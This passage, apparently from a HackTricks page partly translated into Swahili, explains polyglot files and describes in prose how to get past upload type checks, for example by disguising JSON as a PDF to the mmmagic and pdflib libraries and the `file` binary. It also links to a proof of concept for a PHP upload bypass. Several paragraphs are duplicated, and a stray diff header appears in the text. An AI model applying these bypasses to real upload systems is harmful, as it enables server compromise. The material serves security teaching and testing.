Faili za polyglot hutumika kama chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleons zinazoweza kuwepo kwa uhalali katika muundo kadhaa wa faili kwa wakati mmoja. Mfano wa kuvutia ni a [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na kama archive ya RAR. Faili za namna hii hazina kikomo kwa jozi hii pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Faida kuu ya polyglot files iko katika uwezo wao wa kuzunguka udhibiti wa usalama unaochuja faili kwa msingi wa aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari zaidi inayotokana na miundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo vya aina nyingi za faili, inaweza kupita vikwazo hivi kwa uwazi.
Faida kuu ya faili za polyglot iko katika uwezo wao wa kupitisha hatua za usalama zinazochuja faili kulingana na aina. Mazoea ya kawaida katika programu mbalimbali ni kuruhusu aina maalum tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na fomati zinazoweza kuwa hatari (kwa mfano, JS, PHP, au Phar). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa siri kupitia vikwazo hivi.
Licha ya urekebishaji wao, polyglots wanakabiliwa na vizingiti. Kwa mfano, wakati polyglot inaweza kuwakilisha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualiti wa muundo tu wa polyglot huenda usitosheleze kuhakikisha kupakiwa kwake.
Licha ya ufanisi wao, polyglots pia wana mipaka. Kwa mfano, ingawa polyglot inaweza kuonyesha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualgawaji wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha kupakiwa kwake.
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Upload valid JSONs like if it was PDF
### Kupakia JSON sahihi ikionekana kama PDF
How to avoid file type detections by uploading a valid JSON file even if not allowed by faking a PDF file (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
Jinsi ya kuepuka ugundaji wa aina za faili kwa kupakia faili halali ya JSON hata ikiwa haikuruhusiwa kwa kuigiza PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmmagic` library**: As long as the `%PDF` magic bytes are in the first 1024 bytes its valid (get example from post)
- **`pdflib` library**: Add a fake PDF format inside a filed of the JSON so the library thinks its a pdf (get example from post)
- **`file` binary**: It can read up to 1048576 bytes from a file. Just create a JSON bigger than that so it cannot parse the content as a json and then inside the JSON put the initial part of a real PDF and itll think its a PDF
- **`mmagic` library**: Mradi tu `%PDF` magic bytes ziko katika 1024 bytes za mwanzo inachukuliwa kuwa halali (pata mfano kutoka kwenye post)
- **`pdflib` library**: Ongeza muundo wa PDF wa bandia ndani ya field ya JSON ili library ifikiri ni PDF (pata mfano kutoka kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa kuliko hiyo ili isiweze kuchambua maudhui kama json na kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiri ni PDF
## Marejeleo
@ -328,5 +359,8 @@ How to avoid file type detections by uploading a valid JSON file even if not all
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
- [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
- [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
- [0xdf HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
{{#include ../../banners/hacktricks-training.md}}